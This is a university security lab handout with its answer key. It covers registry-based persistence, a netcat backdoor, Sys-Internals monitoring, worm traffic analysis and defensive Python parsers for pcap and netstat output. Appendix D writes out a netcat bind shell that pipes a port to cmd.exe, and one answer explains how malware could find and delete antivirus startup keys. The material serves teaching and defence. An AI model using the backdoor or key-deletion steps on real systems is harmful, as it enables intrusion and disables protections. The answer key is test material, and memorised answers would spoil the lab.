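To make the two Ethereal filters in step 8 concrete, the following Python script is an added example for this lab (not part of the handout): it builds a handful of Ethernet/IPv4/TCP frames, wraps them in a pcap image the way Ethereal saves a capture, and then selects bare SYNs (tcp.flags == 2) per destination port and SYN/ACKs (tcp.flags == 0x12) per answering service. The traffic, addresses (RFC 5737 documentation ranges) and ports are constructed; the SYN-to-port-25 pattern mirrors the mass-mailing behaviour that the hint in Q 4.13 refers to.

```python
"""What the Ethereal filters in this section mean at the byte level: build a few
Ethernet/IPv4/TCP frames, wrap them in a pcap image, and pick out bare SYNs
(tcp.flags == 2) and SYN/ACKs (tcp.flags == 0x12).  Added example for this lab,
not part of the handout; all frames, addresses (RFC 5737 ranges) and ports below are
constructed, and checksums are left at zero because nothing here verifies them."""
import struct
from collections import Counter

SYN, SYN_ACK = 0x02, 0x12


def _ip(dotted):
    return bytes(int(o) for o in dotted.split("."))


def build_tcp_frame(src, dst, sport, dport, flags):
    """Ethernet II + 20-byte IPv4 header + 20-byte TCP header, no payload."""
    eth = b"\x00\x0c\x29\xaa\xbb\xcc" + b"\x00\x50\x56\x11\x22\x33" + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x1234, 0x4000, 64, 6, 0, _ip(src), _ip(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    return eth + ip + tcp


def parse_frame(frame):
    """Return the TCP fields we filter on, or None for anything that is not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:                      # IPv4 protocol field: 6 = TCP
        return None
    tcp = frame[14 + ihl:]
    if len(tcp) < 14:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    return {"src": ".".join(map(str, frame[26:30])), "dst": ".".join(map(str, frame[30:34])),
            "sport": sport, "dport": dport, "flags": tcp[13]}   # byte 13 holds the flag bits


def write_pcap(frames):
    """Minimal pcap image (magic, version 2.4, LINKTYPE_ETHERNET) so the reader below
    can be exercised on exactly the kind of file Ethereal saves."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


def read_pcap(data):
    """Yield the frames of a classic little-endian pcap image (e.g. open(p, 'rb').read())."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic != 0xA1B2C3D4:
        raise ValueError("unsupported pcap magic %#x" % magic)
    pos = 24
    while pos + 16 <= len(data):
        _, _, caplen, _ = struct.unpack("<IIII", data[pos:pos + 16])
        pos += 16
        yield data[pos:pos + caplen]
        pos += caplen


def syn_targets(frames):
    """Ethereal 'tcp.flags == 2': count connection attempts per destination port."""
    return Counter(p["dport"] for p in map(parse_frame, frames) if p and p["flags"] == SYN)


def answering_services(frames):
    """Ethereal 'tcp.flags == 0x12': the SYN/ACK's source address:port is the service
    that accepted the connection."""
    return sorted({(p["src"], p["sport"]) for p in map(parse_frame, frames)
                   if p and p["flags"] == SYN_ACK})


# Constructed traffic: one infected host spraying SYNs to port 25 on several addresses,
# one mail server answering, and one unrelated web connection.
VICTIM = "192.0.2.50"
SAMPLE_FRAMES = [build_tcp_frame(VICTIM, f"198.51.100.{n}", 1024 + n, 25, SYN) for n in range(1, 5)]
SAMPLE_FRAMES += [build_tcp_frame("198.51.100.3", VICTIM, 25, 1027, SYN_ACK),
                  build_tcp_frame(VICTIM, "203.0.113.9", 1040, 80, SYN)]

if __name__ == "__main__":
    frames = list(read_pcap(write_pcap(SAMPLE_FRAMES)))
    print("SYNs per destination port:", dict(syn_targets(frames)))
    print("services that answered:", answering_services(frames))
```

read_pcap accepts the bytes of a classic little-endian pcap file, so the same two functions can be run over virus3.pcap to cross-check what the Ethereal filters show; big-endian or pcapng captures are rejected with a ValueError rather than silently misparsed.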


Questions

Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key.

Screenshot #1Take a screenshot of the failed system and attach it to your lab report.

Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.

Attachment # 1Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Name as the Name and no data. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet AudioFeel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful)

Page 17: System Monitoring with Sys-Internals Lab

Screenshot #2Search through the registry accesses and locate the malicious key. Highlight the key in the RegMon and take a screenshot. Include this with your lab for turn-in.

Q2.4 Why is it that not many hackers have used the registry to disable operating systems?

Screenshot #3Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot.

Screenshot #4Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Q3.5 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur?

Q3.6 What does this command show?


Q3.7 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat?

Screenshot #5
Take a screenshot of the entry running server.exe highlighted in the registry editor.

Q3.8 How can you detect malicious code such as the 8633 program running on your computer?

Q3.9 What should you do to avoid having malicious code such as this installed on your machine in the first place?

Turn-in Checklist
Turn in the:
- Answer sheet
- Screenshots 1-5
- Comments and Additions


Appendix A: Registry Commands via Windows command line

Console Registry Tool for Windows - version 3.0
Copyright (C) Microsoft Corp. 1981-2001. All rights reserved

REG Operation [Parameter List]

Operation [ QUERY | ADD | DELETE | COPY | SAVE | LOAD | UNLOAD | RESTORE | COMPARE | EXPORT | IMPORT ]

For help on a specific operation type:

REG Operation /?

Examples:

REG QUERY /?
REG ADD /?
REG DELETE /?
REG COPY /?
REG SAVE /?
REG RESTORE /?
REG LOAD /?
REG UNLOAD /?
REG COMPARE /?
REG EXPORT /?
REG IMPORT /?

Registry Add example parameters


REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]

KeyName [\\Machine\]FullKey
Machine Name of remote machine - omitting defaults to the current machine. Only HKLM and HKU are available on remote machines
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey The full name of a registry key under the selected ROOTKEY

/v The value name, under the selected Key, to add

/ve adds an empty value name <no name> for the key

/t RegKey data types [ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN | REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN | REG_NONE | REG_EXPAND_SZ ] If omitted, REG_SZ is assumed

/s Specify one charactor that you use as the separator in your data string for REG_MULTI_SZ. If omitted, use "\0" as the separator

/d The data to assign to the registry ValueName being added

/f Force overwriting the existing registry entry without prompt

Examples:

REG ADD \\ABC\HKLM\Software\MyCo Adds a key HKLM\Software\MyCo on remote machine ABC

REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead Adds a value (name: Data, type: REG_BINARY, data: fe340ead)

REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail Adds a value (name: MRU, type: REG_MUTLI_SZ, data: fax\0mail\0\0)

REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d %%systemroot%% Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%) Notice: Use the double percentage ( %% ) inside the expand string



Appendix B: Commands for batch files via the Windows command line. The following was referenced from: http://www.ss64.com/nt/
More detailed explanations can be found there as well. Note: Some of these commands are version dependent.

An A-Z Index of the Windows NT/XP command line

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colours of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen


ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
INSTSRV Install an NT Service
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit NT user account rights
PATH Display or set a search path for executable files
PATHPING IP trace utility
PAUSE Suspend processing of a batch file and display a message


PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove Windows NT environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user is in
SHOWMBRS List the members of an NT Workgroup
SHUTDOWN Shutdown the computer
SHUTGUI Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file


USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINMSD Windows NT Diagnostics
WINMSDP Windows NT Diagnostics II
WMIC WMI Command
XCACLS Change file permissions
XCOPY Copy files and folders


Appendix C – Making a copy of a virtual machine

Follow these directions to set up your second virtual machine:

On your RedHat 8.0 Host, in the root directory make a new directory called WinXPProCopy

# cd /root
# mkdir winXPProCopy

Copy all files from WinXPPro directory into this new directory

# cp winXPPro/* winXPProCopy/

This will take a while to complete.

Now to set up the new virtual machine:
Start up VMWare, and go to File -> New -> New Virtual Machine. Choose Custom and click Next.
Select the operating system as Windows XP Professional.
Change the name of the new machine to winXPProCopy and change the directory to /root/winXPProCopy. Click Next.
Adjust the virtual memory so that you can run all three machines at the same time. Bring it down to 128mb for now.
Select Bridged networking and click Next.
Choose “Use an existing virtual disk” and click Next.
Click Browse and choose the file called winXPPro.vmdk in the new directory.
Click Finish. This will create a new virtual machine on your host system.
You will need to change the ip address of the new WinXP virtual machine. Change it to the old WinXP machine address + 1. For example, if it was w.x.y.z on the original XP machine, change it to w.x.y.z+1. To do this:
Start the new virtual machine. Click Start -> Control Panel -> Network and Internet Connections -> Network Connections. Right click on Local Area Connection -> Properties. Select TCP/IP -> Properties. Make your changes and click OK.


Appendix D – Installation and use of Netcat

EXCERPTS FROM LAB 6: BACKDOORS AND TROJANS

Installing Netcat on the Windows machine
Start your main Windows machine (XP 1) and copy the \\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip the nc11nt.zip program and it should automatically create a directory called nc11nt. Now, whenever you want to run Netcat, you will have to go into this folder and run it from there (unless you add this directory to the path). Now install Netcat on the other XP machine too (XP2).

Installing Netcat on the Linux machine
You should already have a file called netcat.tar.gz in your /home/tools directory. If you don’t, get it from /mnt/nas4112/Tools/Linux/, after mounting the NAS server. Go into your /home/tools directory and execute the following commands:

#tar xvfz netcat.tar.gz
#cd netcat
#make linux
#cp nc /usr/local/sbin

The last command will allow you to run Netcat without having to specify this directory.

Using Netcat
The executable program on both operating systems is called nc and the options are the same on both systems. To run Netcat in client mode so that it sends data across a network, use

#nc [IP Address to send to] [Port to send to]
(e.g. nc a.b.c.d 1234 - This sends data to port 1234 on machine a.b.c.d)

All input is through standard in, so whatever you type on the keyboard will be sent to the other machine. Alternatively, if you would like to read data from a file and pipe that through to the other machine, use

#nc [IP address to send to] [Port to send to] < [File to read from]
(e.g. nc a.b.c.d 1224 < testfile.txt - This sends the data in testfile.txt)

To stop Netcat, one simply has to press Ctrl+C. There are several different options that Netcat can be run with, depending on what it is being used for. The most common options are:

-l specifies that Netcat is running in listening mode
-p specifies which port Netcat should listen on
-v verbose mode so that all results are displayed
-w maximum amount of time (in clock ticks) to wait for a response
-z specifies that Netcat should send very minimal data, usually a synchronized packet, to see if a response is obtained
-e allows Netcat to execute a program to receive or generate network traffic


Look at the README files on both systems under the Netcat folder to find out more information about running Netcat. Many uses for netcat are found in the readme.

To run Netcat in listen mode, use the -l and -p options. The command syntax would be:
#nc -l -p [port to listen to]

If you want to store the input that is received, you can pipe all the received data to a file, using the following command:

#nc -l -p [port to listen to] > [file to write to]
(e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to testfile.txt).
NOTE: If you pipe everything to a file, whatever was previously in that file will be overwritten.

Netcat can also be used to scan ports using the following command (Netcat is being used in client mode for this):

#echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan]
(e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - This will scan ports 1 to 200 on the system with IP address a.b.c.d)

Netcat can also be used to create backdoors on systems. Attackers can push a shell between systems over any TCP or UDP port. The shell will have the privileges of the user that executes Netcat in listener mode on the machine being exploited. For example, if you are on the Linux machine and would like to execute commands on the Windows machine, set up the Netcat listener on the Windows machine with the following command:

#nc -l -p [port to listen to] -e cmd.exe
(e.g. nc -l -p 7777 -e cmd.exe - This will pipe all input received at port 7777 to cmd.exe, which will then execute the commands.)

On the client side, simply type
#nc [listening machine] [port to connect to]
(e.g. nc a.b.c.d 7777)

and start typing in your commands.


Jason Orlosky, Phillip Michael, Todd Lyon

Lab Solutions

Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key.

A1.1 Keys: Data:

(default) (value not set)

CMDstarter “C:\WINDOWS\SYSTEM32\cmd.exe”

Other keys such as VMware may appear depending on what other programs have been installed. The above two are required.

Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.

The Infect.bat file adds a key to the registry to run the Infect.bat file at startup. This key has the name ‘Process’ with data "C:\WINDOWS\HiddenFolder\Infect.bat". The program then creates the directory matching the new key’s data. After it runs itself, it copies the viral file from its own directory into the C:\Windows directory and runs it after renaming it. This way, once the virus is deleted from the Windows directory, a user will think he or she has deleted the virus, when it is actually still on the system in an inactive folder. Searching for MrMalicious will not yield the hidden viral code.

Attachment #1
Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Group## as the Name and no data.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio
Feel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab.

Correct Code:


reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio" /v group##
exit

Slight variations of this code are acceptable but the student must have the reg add line.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful)

A1.3 A hacker would have to write software that searches for a string in the registry key such as firewall or anti-virus. The software could use the query command recursively in the \Run hive to search data strings and names. After parsing the names and data, it could determine whether an antivirus or firewall key exists, and delete it.

Screenshot #1
Search through the registry accesses and locate the malicious key. Highlight the key in RegMon and take a screenshot. Include this with your lab for turn-in.

Screenshot #1 should look like the above

Screenshot #2
Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot. Include this with your lab for turn-in.

The system will show a windows startup screen but then go black and continually stay black. The I/O disk light will blink constantly on the VMware screen and the Windows OS will never boot. Screenshot #2 should look like the attachment on the next page.


Note: A screenshot of the deleted software hive is also permissible.

Q2.4 Why is it that not many hackers have used the registry to disable operating systems?

Hackers generally try to accomplish a goal such as advertising for a company or setting up a money making scheme. Disabling a user’s operating system does nothing other than preventing users from accessing files. This type of attack could be crippling to a business where many monetary or governmental documents are stored.

Screenshot #3
Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Q3.5 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur?

The 7.2 machine is sending continuous SYNs, but because the Windows firewall is up all the packets are dropped.


Q3.6 What does this command show?

All open ports for both this user, and the machine.

Q3.7 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat?

You are still able to gain administrator access.

Screenshot #4
Take a screenshot of the entry running server.exe highlighted in the registry


Q3.8 How can you detect malicious code such as the 8633 program running on your computer?

Use the task manager and know what processes are running on your computer and what they are. Also monitor what ports are open and make sure new ones are not randomly opened.

Q3.9 What should you do to avoid having malicious code such as this installed on your machine in the first place?

Q 4.1 - What is the name of the virus process loaded in memory?
Rnathchk.exe

Q 4.2 - Is this process running a server?
Yes

Q 4.3 - If yes, what port is it listening on?
36276 (Random Port)

Q 4.4 - What type of server does this appear to be?
FTP

Q 4.5 - Do you receive a login prompt?
Yes


S 4.1 - Take a screen capture of your ftp session.

Q 4.6 - What port number do you see a large number of connections to?
445

Q 4.7 - Why do you think this is?
The virus is trying to redistribute itself

Q 4.8 - What port are connections established to?
25 & 48275

Q 4.9 - What is it connecting to these 2 different ports for?
SMTP & IRC (BotNet)
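A3.8 says to watch the open ports, and Q4.6-4.9 identify the infection by its connection pattern: a new listener, many half-open connections to port 445, and sessions to 25 and 48275. The Python below is an added example and not part of the lab: it parses netstat -an output, diffs the listening sockets against a clean baseline, and counts the destination ports of outbound TCP connections. Both captures are constructed for this example; the 192.168.x.x and 10.0.0.5 addresses are made up, while ports 36276, 445, 25 and 48275 are the ones the solution reports.

```python
import re
from collections import Counter

# Constructed `netstat -an` capture from a clean XP machine (the baseline).
BASELINE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  UDP    0.0.0.0:137            *:*
"""

# Constructed capture from the same machine after the sample has run. Addresses are
# made up; the port numbers are the ones the lab solution reports.
INFECTED_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:36276          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1045      192.168.1.20:25        ESTABLISHED
  TCP    192.168.1.10:1046      10.0.0.5:48275         ESTABLISHED
  TCP    192.168.1.10:1047      192.168.1.31:445       SYN_SENT
  TCP    192.168.1.10:1048      192.168.1.32:445       SYN_SENT
  TCP    192.168.1.10:1049      192.168.1.33:445       SYN_SENT
  UDP    0.0.0.0:137            *:*
"""

# Protocol, local addr:port, foreign addr:port, optional state (UDP lines have none).
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text):
    """Parse netstat -an output into one dict per socket line; headers are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, laddr, lport, faddr, fport, state = m.groups()
        rows.append({"proto": proto, "local": laddr, "lport": int(lport),
                     "foreign": faddr, "fport": fport, "state": state or ""})
    return rows


def listening_ports(rows):
    """(proto, port) pairs the machine accepts traffic on; a bound UDP socket counts."""
    return {(r["proto"], r["lport"]) for r in rows
            if r["proto"] == "UDP" or r["state"] == "LISTENING"}


def new_listeners(baseline_text, current_text):
    """Listening sockets present now that were absent from the clean baseline."""
    before = listening_ports(parse_netstat(baseline_text))
    after = listening_ports(parse_netstat(current_text))
    return sorted(after - before)


def outbound_port_counts(rows):
    """Number of TCP connections, attempted or established, per remote port."""
    counts = Counter()
    for r in rows:
        if r["proto"] == "TCP" and r["state"] in ("ESTABLISHED", "SYN_SENT") \
                and r["fport"].isdigit():
            counts[int(r["fport"])] += 1
    return counts


def busiest_destination_port(rows):
    """(port, count) of the remote port with the most connections, or None."""
    counts = outbound_port_counts(rows)
    return counts.most_common(1)[0] if counts else None


if __name__ == "__main__":
    print("new listeners:", new_listeners(BASELINE_NETSTAT, INFECTED_NETSTAT))
    rows = parse_netstat(INFECTED_NETSTAT)
    print("busiest destination port:", busiest_destination_port(rows))
    print("all destination ports:", dict(outbound_port_counts(rows)))
```

Against the constructed captures the diff reports the new TCP listener on 36276, and the destination counts show 445 dominating with a burst of SYN_SENT entries, which is the spreading behaviour Q4.6 and Q4.7 describe. Adding the -o switch (netstat -ano) gives a PID column, which ties a new listener back to the process found with the task manager in A3.8.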

Q 4.10 - What is the virus repeatedly doing to the registry, and why do you think this is?

Reinstalls itself for startup

S 4.2 Take a screen capture of this

Q 4.11 - What is the name and path of the executable created once document.pif is executed?

C:\windows\system32

Q 4.12 - There are 3 files created to replicate the virus on the hard drive; where are they and what are their names?

C:\pic.src
C:\see_this!.pif
C:\my_picture.scr

Q 4.13 - Why do you think the virus searches for files on the hard drive?
To find e-mail addresses (this question is hard and not obvious)

Q 4.14 - What port is it trying to connect to and why?
Port 445, to redistribute itself

S 4.3 - Take a screen capture of this

Q 4.15 - What is an advantage of active logging over active monitoring?
With logging you can view all captured events, but with active monitoring you can only view current events

Do not just run any program you receive; make sure it is from a trusted vendor. Also, using a tool to monitor additions to the registry will help avoid malicious code such as this.


Lab instructions for TA

Create a virtual machine image of Windows XP with Service pack 2 and put on the NAS for this lab.

Also make sure the following files are available for download on the NAS server:

- Regmon.exe

- Jpfwall.exe

- Hiddenfolder - folder containing:
  - Infect.bat
  - RenameMe.exe

- Netcat

- ZSNES.zip

- installer.c

- server.c

- VCToolkitSetup

- dbg_x86_6.4.7.2

Make sure all other files included with the lab are copied to the NAS server.